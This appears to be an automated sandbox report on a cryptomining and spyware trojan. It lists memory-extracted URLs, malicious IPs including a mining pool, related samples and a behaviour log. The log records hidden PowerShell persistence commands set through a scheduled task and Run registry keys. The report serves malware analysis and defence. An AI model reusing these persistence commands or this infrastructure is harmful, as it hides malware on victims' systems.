            https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&svchost.exe, 00000000.00000002.1367511378.0000010D91A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000042.00000002.2281986100.000001DE9969C000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000000.00000003.1365415952.0000010D91A67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367850519.0000010D91A68000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000042.00000002.2281986100.000001DE9969C000.00000004.00000800.00020000.00000000.sdmpfalse
                    		unknown
                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 00000000.00000003.1365285438.0000010D91A6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367901976.0000010D91A70000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000000.00000003.1365415952.0000010D91A67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367850519.0000010D91A68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367386845.0000010D91A2B000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 00000000.00000003.1366308274.0000010D91A65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367386845.0000010D91A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://xmrig.com/wizard%sconhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000000.00000003.1366018989.0000010D91A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1263372120.0000010D91A36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367429694.0000010D91A39000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366170165.0000010D91A39000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=svchost.exe, 00000000.00000002.1367511378.0000010D91A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000000.00000002.1367814340.0000010D91A62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://schemas.microsoft6#ZQpowershell.exe, 00000038.00000002.1931658908.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000000.00000003.1366170165.0000010D91A39000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://xmrig.com/wizardconhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/svchost.exe, 00000000.00000003.1263372120.0000010D91A36000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/svchost.exe, 00000000.00000002.1367814340.0000010D91A62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://github.com/Pester/Pesterpowershell.exe, 00000042.00000002.2281986100.000001DE9969C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000000.00000003.1365285438.0000010D91A6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367511378.0000010D91A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367901976.0000010D91A70000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366308274.0000010D91A65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365970028.0000010D91A59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000000.00000002.1367386845.0000010D91A2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000000.00000002.1367511378.0000010D91A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://dynamic.tsvchost.exe, 00000000.00000003.1365253867.0000010D91A50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://xmrig.com/docs/algorithmsconhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=svchost.exe, 00000000.00000002.1367814340.0000010D91A62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://xmrig.com/benchmark/%sconhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://aka.ms/pscore68powershell.exe, 00000039.00000002.2283061146.0000022F420B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.2287502418.0000019C5BE51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.2281986100.000001DE99471000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000000.00000002.1367814340.0000010D91A62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameconhost.exe, 00000014.00000002.1399936831.00000113DCE61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2283061146.0000022F420B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.2287502418.0000019C5BE51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.2281986100.000001DE99471000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://www.bingmapsportal.comsvchost.exe, 00000000.00000002.1367337795.0000010D91A13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000000.00000003.1366308274.0000010D91A65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367386845.0000010D91A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365970028.0000010D91A59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000000.00000003.1365415952.0000010D91A67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367850519.0000010D91A68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367386845.0000010D91A2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      http://schemas.microsoftpowershell.exe, 00000038.00000002.1931071513.0000000002DC1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.1992736988.0000000003357000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.1997379038.0000000003807000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000000.00000003.1365285438.0000010D91A6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367901976.0000010D91A70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000000.00000003.1365253867.0000010D91A50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown

                                                                                            World Map of Contacted IPs

                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs

                                                                                            Public IPs

                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            45.76.89.70
                                                                                            		pool.hashvault.proUnited States
                                                                                            		20473AS-CHOOPAUStrue
                                                                                            147.185.221.22
                                                                                            		unknownUnited States
                                                                                            		12087SALSGIVERUStrue

                                                                                            General Information

                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                            Analysis ID:1528504
                                                                                            Start date and time:2024-10-08 00:23:01 +02:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 13m 13s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Number of analysed new started processes analysed:102
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:2
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:e7WMhx18XN.exe
                                                                                            renamed because original name is a hash value
                                                                                            Original Sample Name:38be83afea1e906c05e5b851253cbc6a.exe
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.spyw.expl.evad.mine.winEXE@157/47@1/2
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 34.6%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 99%
                                                                                            • Number of executed functions: 108
                                                                                            • Number of non-executed functions: 130
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .exe

                                                                                            Warnings

                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, SIHClient.exe, svchost.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 20.42.73.29
                                                                                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                            • Execution Graph export aborted for target cmd.exe, PID 5900 because there are no executed function
                                                                                            • Execution Graph export aborted for target cmd.exe, PID 6024 because there are no executed function
                                                                                            • Execution Graph export aborted for target conhost.exe, PID 2660 because there are no executed function
                                                                                            • Execution Graph export aborted for target conhost.exe, PID 2712 because there are no executed function
                                                                                            • Execution Graph export aborted for target conhost.exe, PID 3108 because there are no executed function
                                                                                            • Execution Graph export aborted for target conhost.exe, PID 3128 because there are no executed function
                                                                                            • Execution Graph export aborted for target conhost.exe, PID 3332 because there are no executed function
                                                                                            • Execution Graph export aborted for target conhost.exe, PID 3480 because there are no executed function
                                                                                            • Execution Graph export aborted for target conhost.exe, PID 5304 because there are no executed function
                                                                                            • Execution Graph export aborted for target conhost.exe, PID 6168 because there are no executed function
                                                                                            • Execution Graph export aborted for target conhost.exe, PID 6320 because there are no executed function
                                                                                            • Execution Graph export aborted for target conhost.exe, PID 7352 because there are no executed function
                                                                                            • Execution Graph export aborted for target dllhost.exe, PID 5880 because there are no executed function
                                                                                            • Execution Graph export aborted for target e7WMhx18XN.exe, PID 7728 because it is empty
                                                                                            • Execution Graph export aborted for target lsass.exe, PID 628 because there are no executed function
                                                                                            • Execution Graph export aborted for target powershell.exe, PID 6668 because there are no executed function
                                                                                            • Execution Graph export aborted for target winlogon.exe, PID 552 because there are no executed function
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                            • VT rate limit hit for: e7WMhx18XN.exe

                                                                                            Simulations

                                                                                            Behavior and APIs

                                                                                            TimeTypeDescription
                                                                                            00:24:03Task SchedulerRun new task: services64 path: C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                            00:25:05Task SchedulerRun new task: $rbx-tXbF0u58 path: cmd.exe s>/C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
                                                                                            00:25:05AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
                                                                                            00:25:14AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
                                                                                            18:23:57API Interceptor5x Sleep call for process: WMIC.exe modified
                                                                                            18:24:02API Interceptor489x Sleep call for process: conhost.exe modified
                                                                                            18:24:14API Interceptor113673x Sleep call for process: powershell.exe modified
                                                                                            18:24:18API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                            18:24:53API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                            18:25:58API Interceptor131x Sleep call for process: winlogon.exe modified
                                                                                            18:26:05API Interceptor47x Sleep call for process: lsass.exe modified
                                                                                            18:26:10API Interceptor1x Sleep call for process: cmd.exe modified

                                                                                            Joe Sandbox View / Context

                                                                                            IPs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            45.76.89.70GcqJPBLD2Q.exeGet hashmaliciousBitCoin Miner, SilentXMRMiner, UACMe, XmrigBrowse
                                                                                              file.exeGet hashmaliciousXmrigBrowse
                                                                                                o9OIGsDt4m.exeGet hashmaliciousXmrigBrowse
                                                                                                  System.exeGet hashmaliciousXmrigBrowse
                                                                                                    Update.exeGet hashmaliciousBlank Grabber, Redline Clipper, XmrigBrowse
                                                                                                      file.exeGet hashmaliciousXmrigBrowse
                                                                                                        file.exeGet hashmaliciousXmrigBrowse
                                                                                                          gutpOKDunr.exeGet hashmaliciousXmrigBrowse
                                                                                                            file.exeGet hashmaliciousXmrigBrowse
                                                                                                              SecuriteInfo.com.Win64.MalwareX-gen.11857.961.exeGet hashmaliciousXmrigBrowse
                                                                                                                147.185.221.22SecuriteInfo.com.Trojan.MulDrop28.25270.15094.4444.exeGet hashmaliciousNjratBrowse
                                                                                                                  Bpz46JayQ4.exeGet hashmaliciousXWormBrowse
                                                                                                                    e4L9TXRBhB.exeGet hashmaliciousXWormBrowse
                                                                                                                      BootstrapperV1.19.exeGet hashmaliciousXWormBrowse
                                                                                                                        wSVyC8FY.exeGet hashmaliciousXWormBrowse
                                                                                                                          eFvQTTtxej.exeGet hashmaliciousNjratBrowse
                                                                                                                            SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeGet hashmaliciousXWormBrowse
                                                                                                                              BANK PAYMENT COPY.docGet hashmaliciousXWormBrowse
                                                                                                                                jQ2ryeS5ZP.exeGet hashmaliciousPureCrypter, Revenge, CyberGate, DCRat, GuLoader, Njrat, PureLog StealerBrowse
                                                                                                                                  AutoWizard.exeGet hashmaliciousQuasarBrowse

                                                                                                                                    Domains

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    pool.hashvault.proGcqJPBLD2Q.exeGet hashmaliciousBitCoin Miner, SilentXMRMiner, UACMe, XmrigBrowse
                                                                                                                                    • 45.76.89.70
                                                                                                                                    C5Lg2JSPlD.exeGet hashmaliciousSilentXMRMiner, XmrigBrowse
                                                                                                                                    • 95.179.241.203
                                                                                                                                    file.exeGet hashmaliciousRDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                                                                                                                    • 45.76.89.70
                                                                                                                                    file.exeGet hashmaliciousXmrigBrowse
                                                                                                                                    • 45.76.89.70
                                                                                                                                    PT54FFSL7ET46RASB.exeGet hashmaliciousLummaC Stealer, PureLog Stealer, Xmrig, zgRATBrowse
                                                                                                                                    • 142.202.242.43
                                                                                                                                    PT54FFSL7ET46RASB.exeGet hashmaliciousLummaC, PureLog Stealer, Xmrig, zgRATBrowse
                                                                                                                                    • 95.179.241.203
                                                                                                                                    o9OIGsDt4m.exeGet hashmaliciousXmrigBrowse
                                                                                                                                    • 95.179.241.203
                                                                                                                                    file.exeGet hashmaliciousXmrigBrowse
                                                                                                                                    • 95.179.241.203
                                                                                                                                    System.exeGet hashmaliciousFlesh Stealer, XmrigBrowse
                                                                                                                                    • 142.202.242.45
                                                                                                                                    System.exeGet hashmaliciousXmrigBrowse
                                                                                                                                    • 95.179.241.203

                                                                                                                                    ASNs

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    AS-CHOOPAUSGcqJPBLD2Q.exeGet hashmaliciousBitCoin Miner, SilentXMRMiner, UACMe, XmrigBrowse
                                                                                                                                    • 45.76.89.70
                                                                                                                                    C5Lg2JSPlD.exeGet hashmaliciousSilentXMRMiner, XmrigBrowse
                                                                                                                                    • 95.179.241.203
                                                                                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 66.42.126.39
                                                                                                                                    z3hir.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                    • 44.172.145.8
                                                                                                                                    arm7-20241006-0950.elfGet hashmaliciousUnknownBrowse
                                                                                                                                    • 108.61.212.64
                                                                                                                                    81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                    • 155.138.145.67
                                                                                                                                    Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    • 45.32.1.23
                                                                                                                                    nJohIBtNm5.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLineBrowse
                                                                                                                                    • 136.244.88.135
                                                                                                                                    OXrZ6fj4Hq.exeGet hashmaliciousNeshta, Oski Stealer, StormKitty, SugarDump, Vidar, XWormBrowse
                                                                                                                                    • 108.61.168.124
                                                                                                                                    https://bit.ly/4eqfXtgGet hashmaliciousUnknownBrowse
                                                                                                                                    • 80.240.30.52
                                                                                                                                    SALSGIVERUSSecuriteInfo.com.Trojan.MulDrop28.25270.15094.4444.exeGet hashmaliciousNjratBrowse
                                                                                                                                    • 147.185.221.22
                                                                                                                                    1c8DbXc5r0.exeGet hashmaliciousXWormBrowse
                                                                                                                                    • 147.185.221.18
                                                                                                                                    PixpFUv4G7.exeGet hashmaliciousQuasar, XWormBrowse
                                                                                                                                    • 147.185.221.21
                                                                                                                                    H2f8SkAvdV.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                                                                                                                    • 147.185.221.23
                                                                                                                                    A39tzaySzX.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                    • 147.185.221.23
                                                                                                                                    Bpz46JayQ4.exeGet hashmaliciousXWormBrowse
                                                                                                                                    • 147.185.221.22
                                                                                                                                    e4L9TXRBhB.exeGet hashmaliciousXWormBrowse
                                                                                                                                    • 147.185.221.22
                                                                                                                                    H1N45BQJ8x.exeGet hashmaliciousXWormBrowse
                                                                                                                                    • 147.185.221.23
                                                                                                                                    r4RF3TX5Mi.exeGet hashmaliciousXWormBrowse
                                                                                                                                    • 147.185.221.21
                                                                                                                                    BootstrapperV1.19.exeGet hashmaliciousXWormBrowse
                                                                                                                                    • 147.185.221.22

                                                                                                                                    JA3 Fingerprints

                                                                                                                                    No context

                                                                                                                                    Dropped Files

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sysGcqJPBLD2Q.exeGet hashmaliciousBitCoin Miner, SilentXMRMiner, UACMe, XmrigBrowse
                                                                                                                                      C5Lg2JSPlD.exeGet hashmaliciousSilentXMRMiner, XmrigBrowse
                                                                                                                                        TwrhjEKqxk.exeGet hashmaliciousXmrigBrowse
                                                                                                                                          aA45th2ixY.exeGet hashmaliciousXmrigBrowse
                                                                                                                                            1mqzOM6eok.exeGet hashmaliciousXmrigBrowse
                                                                                                                                              updater.exeGet hashmaliciousXmrigBrowse
